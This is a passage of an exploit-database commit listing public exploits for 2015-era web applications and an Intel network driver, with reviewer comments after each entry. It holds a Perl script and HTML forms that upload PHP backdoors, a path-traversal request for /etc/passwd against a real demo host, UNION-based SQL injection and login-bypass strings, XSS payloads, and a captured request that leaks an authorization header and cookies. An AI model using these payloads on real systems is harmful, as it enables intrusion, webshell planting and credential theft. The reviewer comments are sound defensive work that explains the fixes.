Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
Content-Length: 1300
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription%5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7%5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D=1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisEdit%5D=1
- Vulnerable parameter: parameters[data][7][title]
::DISCLOSURE::
+ 12/10/2014: Detect vulnerability
+ 12/10/2014: Send the detail vulnerability to vendor
+ 03/11/2015: Public information
::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2275
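Review bot: the captured request carries credentials and session material that should have been redacted before publication: `Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=`, the `wcf_cookieHash=f774ed47...` and `__cfduid=...` cookies, and the `t=7d53f8ad...` token in the request URL. The `Host: target` placeholder is also inconsistent with the `demo.woltlab.com` URLs left inside the body. The header line `#Vulnerability title: Community Gallery - Stored Cross-Site Scripting` wraps onto a second line (`vulnerability`), as does `#Download link:`. The useful line is `- Vulnerable parameter: parameters[data][7][title]`; the mitigation to record is HTML-encoding the stored title wherever it is rendered, since the payload is stored and replays to every viewer of the image.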

56
platforms/php/webapps/36371.txt Executable file

@ -0,0 +1,56 @@
[+]Title: Codiad v2.5.3 - LFI Vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 12/03/2015
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Pie Register 2.x suffers, from a Local File Disclosure vulnerability.
[+]Proof Of Concept:
[PHP]
//////////////////////////////////////////////////////////////////
// Run Download
//////////////////////////////////////////////////////////////////
if(isset($_GET['type']) && ($_GET['type']=='directory' || $_GET['type']=='root')){
// Create tarball
$filename = explode("/",$_GET['path']);
//$filename = array_pop($filename) . "-" . date('Y.m.d') . ".tar.gz";
$filename = array_pop($filename) . "-" . date('Y.m.d');
$targetPath = DATA . '/';
$dir = WORKSPACE . '/' . $_GET['path'];
if(!is_dir($dir)){
exit('<script>parent.codiad.message.error("Directory not found.")</script>');
}
//////////////////////////////////////////////////////////////////
// Check system() command and a non windows OS
//////////////////////////////////////////////////////////////////
if(isAvailable('system') && stripos(PHP_OS, 'win') === false){
# Execute the tar command and save file
$filename .= '.tar.gz';
system("tar -pczf ".$targetPath.$filename." -C ".WORKSPACE." ".$_GET['path']);
$download_file = $targetPath.$filename;
}elseif(extension_loaded('zip')){ //Check if zip-Extension is availiable
//build zipfile
require_once 'class.dirzip.php';
$filename .= '.zip';
$download_file = $targetPath.$filename;
DirZip::zipDir($dir, $targetPath .$filename);
}else{
exit('<script>parent.codiad.message.error("Could not pack the folder, zip-extension missing")</script>');
}
}else{
$filename = explode("/",$_GET['path']);
$filename = array_pop($filename);
$download_file = WORKSPACE . '/' . $_GET['path'];
}
[PHP]
http://demo.codiad.com/i/197156553/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined
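Review bot: `Pie Register 2.x suffers, from a Local File Disclosure vulnerability.` under `[+]Overview:` is left over from another advisory; the title is Codiad v2.5.3 and the overview should say so. The PoC URL points at the vendor's public demo host `demo.codiad.com`; use a placeholder host as the other entries do. The `[PHP]` tag that opens the excerpt is closed with a second `[PHP]` instead of `[/PHP]`. In the excerpt, the final `else` branch builds `$download_file = WORKSPACE . '/' . $_GET['path'];` and the directory branch builds `$dir = WORKSPACE . '/' . $_GET['path'];`, neither canonicalised; the fix is to `realpath()` the joined path and refuse it unless it still starts with `WORKSPACE`. The `system("tar -pczf ".$targetPath.$filename." -C ".WORKSPACE." ".$_GET['path'])` line also interpolates the request value into a shell command and needs `escapeshellarg()` at minimum.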

66
platforms/php/webapps/36372.txt Executable file

@ -0,0 +1,66 @@
#########################################################
# Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability
# Google dork: inurl:wp-content/themes/DesignFolio-Plus
# Author: CrashBandicot
# Date: 04.03.2015
# Vendor HomePage: https://github.com/UpThemes/DesignFolio-Plus
# Software Link: https://github.com/UpThemes/DesignFolio-Plus/archive/master.zip
# tested on : MsWin32
#########################################################
Vulnerable File : upload-file.php
<?php
//Upload Security
$upload_security = md5($_SERVER['SERVER_ADDR']);
$uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
if( $_FILES[$upload_security] ):
$file = $_FILES[$upload_security];
$file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
if(chmod($file,0777)):
echo "success";
else:
echo "error".$_FILES[$upload_security]['tmp_name'];
endif;
else:
echo "error".$_FILES[$upload_security]['tmp_name'];
endif;
endif;
?>
Exploit
#!/usr/bin/perl
use Digest::MD5 qw(md5 md5_hex);
use MIME::Base64;
use IO::Socket;
use LWP::UserAgent;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\n\t ! *** # ^_^ # *** !\n\t :p\n\n";
$use = "\n\t [!] ./$0 127.0.0.1 backdoor.php";
($target ,$file) = @ARGV;
die "$use" unless $ARGV[0] && $ARGV[1];
if($target =~ /http:\/\/(.*)\//){ $target = $1; }
elsif($target =~ /http:\/\/(.*)/){ $target = $1; }
elsif($target =~ /https:\/\/(.*)\//){ $target = $1; }
elsif($target =~ /https:\/\/(.*)/){ $target = $1; }
my $addr = inet_ntoa((gethostbyname($target))[4]);
my $digest = md5_hex($addr);
my $dir = encode_base64('../../../../');
my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
$pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]);
if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; }
__END__
# File path: http://target/shell.php
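Review bot: in the excerpted `upload-file.php`, `$upload_security = md5($_SERVER['SERVER_ADDR'])` is used as the upload field name as if it were a secret, but the server's own address is not secret (the Perl script below derives it with `gethostbyname` and `md5_hex`), and `$uploaddir = base64_decode( $_REQUEST['upload_path'] )` takes the destination directory from the request with no capability check, extension check or canonicalisation before `move_uploaded_file()` and `chmod($file,0777)`. The fix to recommend is running the handler inside WordPress, requiring `current_user_can('upload_files')` plus a nonce, writing only under `wp_upload_dir()`, and validating the name with `wp_check_filetype()`. In the Perl script, `$use` names `backdoor.php` while the closing comment says `# File path: http://target/shell.php`; pick one. The script also lacks `use strict; use warnings;`, and `# tested on : MsWin32` is inconsistently capitalised relative to the other header lines.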

32
platforms/php/webapps/36373.txt Executable file

@ -0,0 +1,32 @@
######################################################################
# Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
# Google Dork: inurl:com_simplephotogallery
# Date: 10.03.2015
# Exploit Author: CrashBandicot @DosPerl
# My Github: github.com/CCrashBandicot
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
# Version: 1
# Tested on: Windows
######################################################################
# Vulnerable File : uploadFile.php
# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php
20. $fieldName = 'uploadfile';
87. $fileTemp = $_FILES[$fieldName]['tmp_name'];
94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96. if(! move_uploaded_file($fileTemp, $uploadPath))
# Exploit :
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
<input type="file" name="uploadfile"><br>
<input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
# Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php)
# Shell Path : http://localhost/backdoor__[RandomString].php
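Review bot: the four excerpted lines (`20.`, `87.`, `94.`, `96.`) show `$uploadPath = urldecode($_REQUEST["jpath"]).$fileName;` feeding `move_uploaded_file()` directly, but the advisory never states whether `uploadFile.php` is reachable without an administrator session even though it lives under `/administrator/components/`; that is the first thing a reader triaging it needs to know. `# Version: 1` is not a usable release identifier. The fix to suggest is to resolve `jpath` with `realpath()` and refuse anything outside a fixed gallery directory, check the extension and MIME type of `$fileName`, and require a Joomla session and form token before the handler runs.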

28
platforms/php/webapps/36374.txt Executable file

@ -0,0 +1,28 @@
# Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/reflex-gallery/
# Date: 08.03.2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://wordpress.org/plugins/reflex-gallery/
# Software Link: https://downloads.wordpress.org/plugin/reflex-gallery.zip
# Version: 3.1.3 (Last)
# Tested on: Windows
# p0C : http://i.imgur.com/mj8yADU.png
# Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
# add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .$_GET['Year'].'/'.$_GET['Month']. "
Vulnerable File : php.php
50. if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
173. $result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/');
# Exploit :
<form method="POST" action="http://127.0.0.1:1337/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03" enctype="multipart/form-data" >
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
# Shell Path : http://127.0.0.1:1337/wordpress/wp-content/uploads/2015/03/backdoor.php
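Review bot: `# Version: 3.1.3 (Last)` should say "latest at time of writing" with a date, since "last" reads as if no further releases exist. The two excerpted lines (`50.` and `173.`) show `$_GET['Year'].'/'.$_GET['Month']` used as path components without validation and `move_uploaded_file()` on `qqfile`, but not whether `php.php` checks a capability or nonce; if the full file has none, the fix is to require `current_user_can('upload_files')` plus a nonce, cast `Year` and `Month` to integers, and check the extension through `wp_check_filetype()`. The `# p0C : http://i.imgur.com/...` screenshot is not a reproducible proof of concept and should be secondary to the form below it.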

11
platforms/php/webapps/36379.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50857/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?menu_no_top=eim&uniqcode=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28123%29;% 3C/script%3E
http://www.example.com/index.php?menu_no_top=eim&uniqcode=USR&isAdmin=%22%3E%3C/iframe%3E%3Cscript%3E alert%28123%29;%3C/script%3E
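Review bot: both PoC URLs contain stray spaces copied from line-wrapping in the SecurityFocus source (`;% 3C/script%3E` in the first, `%3Cscript%3E alert` in the second), so as written they are not valid URLs; the spaces should be removed when transcribing. The description also promises an SQL-injection issue, but this file holds only the two reflected XSS cases (`uniqcode` and `isAdmin` on `index.php`); the split across the three BID 50857 files in this commit should be stated in each.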


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50857/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected.
http://www.example.com/lib/controllers/centralcontroller.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C /script%3E/?uniqcode=USR&VIEW=MAIN&isAdmin=1
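Review bot: the PoC URL contains a stray space (`%3C /script%3E`) from line-wrapping in the source and is not valid as written. This is the path-info variant on `centralcontroller.php` (the payload sits in the path segment before `?uniqcode=USR`), which the description does not distinguish from the query-parameter cases in the sibling BID 50857 files; naming the injection point would help, as would noting that the fix is output encoding of the reflected path component.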


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50857/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected.
http://www.example.com/lib/controllers/centralcontroller.php?capturemode=updatemode&uniqcode=NAT&id=1 %27%20union%20select%20version%28%29,user%28%29%20--%20
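Review bot: the PoC URL contains a stray space (`id=1 %27`) from line-wrapping in the source and is not valid as written. This is the one SQL-injection case among the three BID 50857 files, on the `id` parameter of `centralcontroller.php?capturemode=updatemode&uniqcode=NAT`, and the file should say so rather than repeating the generic description; the mitigation to record is binding `id` as an integer parameter.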

11
platforms/php/webapps/36382.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50860/info
1-jquery-photo-gallery-slideshow-flash plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
1-jquery-photo-gallery-slideshow-flash 1.01 is vulnerable; other versions may also be affected.
UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described.
http://www.example.com/[path]/wp-content/plugins/1-jquery-photo-gallery-slideshow-flash/wp-1pluginjquery.php?page=[xss]
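Review bot: the entry's own text says `UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described.`, yet it is filed as a working exploit; the title or metadata should carry that disputed status so the entry is not matched as a confirmed issue by anyone scanning this index.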


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50861/info
flash-album-gallery plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/facebook.php?i=[xss]
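Review bot: no affected or fixed plug-in version is given anywhere in the file, unlike the sibling BID entries in this commit; the only specific content is the `facebook.php?i=[xss]` location. Add the version line, and note that the mitigation is output encoding of the `i` parameter.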

11
platforms/php/webapps/36384.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50870/info
SugarCRM Community Edition is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SugarCRM Community Edition 6.3.0RC1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&where=0%29%20union%20select%20version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71%20--%20
http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&order=SQL_CODE_HERE%20--%20
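Review bot: `order=SQL_CODE_HERE%20--%20` is a placeholder, not a demonstration, and the file names only `6.3.0RC1` (a release candidate) as affected with no fixed version, so it is hard to tell which shipped releases carry the issue. The two injection points (`where` and `order` on the `json` entry point of `get_full_list`) should be named in the text; the mitigation for both is a whitelist of allowed column names for `order` and a parameterised filter for `where` rather than string concatenation.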

41
platforms/php/webapps/36385.txt Executable file

@ -0,0 +1,41 @@
#======================================================================================
# Title : Joomla Simple Photo Gallery - SQL injection
#
# Author : Mr.Moneer
#
# Dork Google 1: inurl:/com_simplephotogallery site:com
# Dork Google 2: inurl:/com_simplephotogallery site:org
# Dork Google 3: inurl:/com_simplephotogallery site:fr
# Dork Google 4: inurl:/com_simplephotogallery/
#
# Date : 13-03-2015
#
#
# Vendor Homepage: https://www.apptha.com/
#
# Source Plugin:
https://www.apptha.com/category/extension/joomla/simple-photo-gallery
#
# Version : 1
#
# Tested on : sqlmap
#
#======================================================================================
#
# Example :
#
#
http://www.site.com/index.php?option=com_simplephotogallery&view=images&albumid=[Sqli]
#
#
# video Demo : http://youtu.be/-QjCMAB3vrg
#
# facebook : https://www.facebook.com/moneer.massoud
# youtube : https://www.youtube.com/user/moneermasoud
# google+ : https://plus.google.com/u/0/+moneermassoud
#
#
#
# Greets To : Alansary | Moad Hack | Ly Ghost
#
#======================================================================================
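Review bot: The entry lacks the facts a consumer of the database needs: "Version : 1" does not identify a release, "Tested on : sqlmap" names a tool rather than the software version or platform tested, and there is no vendor notification or fix status; the Google dorks, video demo and social-media lines carry no technical content and should be trimmed. The header format is also inconsistent, with the vendor URL and the albumid PoC URL left as bare lines between "#"-prefixed ones. Ask the submitter for the tested component version and whether a fixed release exists before this is indexed.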

platforms/php/webapps/36386.txt (14 lines, executable file)
@ -0,0 +1,14 @@
# Exploit Title: Smart PHP Poll Auth Bypass Vulnerability
# Google Dork: Copyright ? Smart PHP Poll. All Rights Reserved.
# Exploit Author: Mr.tro0oqy (from Yemen)
# Email : uxxd@hotmail.com
# Download Script :http://www.scriptsez.net/download/download.php?action=download&p=smart_php_poll.zip&ns=1
go to www.target.com/path/admin.php
username = admin 'or' 1=1
password = anything
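Review bot: The "Google Dork" line has an encoding artifact ("Copyright ? Smart PHP Poll", where the copyright symbol was), and the entry gives no version, date or fix status for Smart PHP Poll; the download link also points at a third-party script archive rather than a vendor page. Since the PoC is a classic SQL-based login bypass on admin.php, the title and description should say "SQL injection in the admin login" rather than only "Auth Bypass", so the entry is classified correctly.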

platforms/php/webapps/36401.txt (10 lines, executable file)
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50877/info
AtMail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AtMail 1.0.4 is vulnerable; other versions may also be affected.
GET: http://www.example.com/search.php?func=<script>alert(&#039;XSS&#039;);</script>
GET: http://www.example.com/search.php?func=<script>alert(&#039;XSS&#039;);</script>
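Review bot: The last two lines of the file are identical (the same search.php?func= GET request twice), so the entry shows one vector while claiming "multiple cross-site scripting vulnerabilities"; either the second line should carry the other affected parameter from BID 50877 or the duplicate should be dropped. The payload is also HTML-entity-encoded (&#039; for the quote character), which is a rendering artifact carried over from the source page rather than the literal request, and should be noted or normalised.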

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50910/info
Elxis CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/elxis/index.php?id=3&Itemid=9&option=com_content&task=%22%20onmouseover%3dprompt%28dclabs%29%20dcl%3d%22
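Review bot: This file and the following one both reproduce the BID 50910 description verbatim and differ only in the URL; they are two vectors of a single advisory, so each should say which component it covers (here the frontend index.php "task" parameter under com_content, the other the administrator path) instead of repeating the same generic text.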

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50910/info
Elxis CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com//elxis/administrator/index.php/%22onmouseover=prompt(dclabs)%3E
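Review bot: The URL has a doubled slash ("example.com//elxis/administrator/..."), which looks like a copy error in the PoC path; confirm the intended path. The description is also a verbatim copy of the preceding Elxis file and does not say that this vector is in the administrator interface rather than the frontend.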

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50921/info
The Pretty Link plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Pretty Link 1.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/wp-content/plugins/pretty-link/pretty-bar.php?url=[xss]
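Review bot: Number disagreement in the description: the first sentence says "a cross-site scripting vulnerability" while the next says "these issues"; this is template text copied from the multi-issue entries and should read "this issue" for the single pretty-bar.php?url= vector.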

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50925/info
Simple Machines Forum is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Simple Machines Forum 1.1.15 is vulnerable; other versions may also be affected.
http://www.example.com/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
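Review bot: Typo in the placeholder: "[patch]" should be "[path]", as in the other entries in this commit. More importantly, the URL shows the upload vector is the bundled FCKeditor file-manager browser (editor/filemanager/browser/default/browser.html with the PHP connector), not SMF's own code, so the description should attribute the issue to that bundled third-party component; that is what an operator of SMF 1.1.15 would need to disable or remove, and it is not conveyed by "fails to properly sanitize user-supplied input".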

platforms/windows/dos/36392.txt (724 lines, executable file)
@ -0,0 +1,724 @@
/*
Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability
Vendor: Intel
Product webpage: http://www.intel.com
Affected product(s):
Network Adapter Driver for Windows XP
Network Adapter Driver for Windows 7
Network Adapter Driver for Windows 8
Network Adapter Driver for Windows 2008/R2
Network Adapter Driver for Windows 2012/R2
Affected version(s):
Intel(R) iQVW64.SYS v1.03.0.7
Intel(R) iQVW32.SYS v1.03.0.7
Tested Operating systems:
Windows XP SP3 (32-bit)
Windows 7 SP1 (32/64-bit)
Date: 14/03/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-2291
Disclosure Timeline:
10-06-2014: Vendor Notification
21-06-2014: Vendor Response/Feedback
08-08-2014: Vendor Response/Feedback
26-08-2014: Requesting Status/No Vendor Response
30-09-2014: Requesting Status/No Vendor Response
22-10-2014: Requesting Status/No Vendor Response
10-01-2015: Requesting Status/No Vendor Response
15-01-2015: Requesting Status/No Vendor Response
14-03-2015: CVE Requested
14-03-2015: CVE Assigned
14-03-2015: Public Disclosure
Description:
A vulnerability in iqvw32.sys and iqvw64e.sys drivers has been discovered in Intel Network Adapter Driver.
The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes 0x80862013,
0x8086200B, 0x8086200F, 0x80862007 using METHOD_NEITHER and due to insecure permissions allowing everyone read and write
access to privileged use only functionality.
Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
IOCTL 0x80862013
----------------
Microsoft (R) Windows Debugger Version 6.2.9200.20512 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Opened \\.\pipe\com_2
Waiting to reconnect...
Connected to Windows 7 7601 x64 target at (Thu Feb 26 18:33:59.291 2015 (UTC + 2:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*k:\symbols*http://msdl.microsoft.com/download/symbols;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\google*http://chromium-browser-symsrv.commondatastorage.googleapis.com;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\microsoft*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 7 Kernel Version 7601 MP (1 procs) Free x64
Built by: 7601.18700.amd64fre.win7sp1_gdr.141211-1742
Machine Name:
Kernel base = 0xfffff800`03655000 PsLoadedModuleList = 0xfffff800`03898890
System Uptime: not available
KDTARGET: Refreshing KD connection
*** Fatal System Error: 0x0000003b
(0x00000000C0000005,0xFFFFF88005A0BFD2,0xFFFFF8800653A9C0,0x0000000000000000)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
Connected to Windows 7 7601 x64 target at (Thu Feb 26 20:29:05.978 2015 (UTC + 2:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
...............................
Loading User Symbols
.....
Loading unloaded module list
....Unable to enumerate user-mode unloaded modules, Win32 error 0n30
Loading Wow64 Symbols
.....
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 3B, {c0000005, fffff88005a0bfd2, fffff8800653a9c0, 0}
*** ERROR: Module load completed but symbols could not be loaded for iqvw64e.sys
Followup: MachineOwner
---------
nt!RtlpBreakWithStatusInstruction:
fffff800`036c3cb0 cc int 3
3: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff88005a0bfd2, Address of the instruction which caused the bugcheck
Arg3: fffff8800653a9c0, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.
Debugging Details:
------------------
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
FAULTING_IP:
iqvw64e+3fd2
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx]
CONTEXT: fffff8800653a9c0 -- (.cxr 0xfffff8800653a9c0)
rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei pl nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010202
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] ds:002b:00000000`deadbeef=????????????????
Resetting default scope
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x3B
PROCESS_NAME: ConsoleApplica
CURRENT_IRQL: 2
LAST_CONTROL_TRANSFER: from fffff88005a091ac to fffff88005a0bfd2
STACK_TEXT:
fffff880`0653b3a0 fffff880`05a091ac : fffffa80`4aac7b00 00000000`00000001 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x3fd2
fffff880`0653b8a0 fffff800`039e80f7 : 00000000`80862013 fffff880`0653bb60 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x11ac
fffff880`0653b8d0 fffff800`039e8956 : fffff680`003b5ee8 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x607
fffff880`0653ba00 fffff800`036cb113 : 00000000`0021df01 0000007f`ffffffff 00000000`0021df00 00000980`00000000 : nt!NtDeviceIoControlFile+0x56
fffff880`0653ba70 00000000`73b02e09 : 00000000`73b02944 00000000`775a01b4 00000000`73b70023 00000000`00000246 : nt!KiSystemServiceCopyEnd+0x13
00000000`0021e898 00000000`73b02944 : 00000000`775a01b4 00000000`73b70023 00000000`00000246 00000000`001dff7c : wow64cpu!CpupSyscallStub+0x9
00000000`0021e8a0 00000000`73b7d286 : 00000000`00000000 00000000`73b01920 00000000`0021eb30 00000000`773decf1 : wow64cpu!DeviceIoctlFileFault+0x31
00000000`0021e960 00000000`73b7c69e : 00000000`00000000 00000000`00000000 00000000`73b74b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa
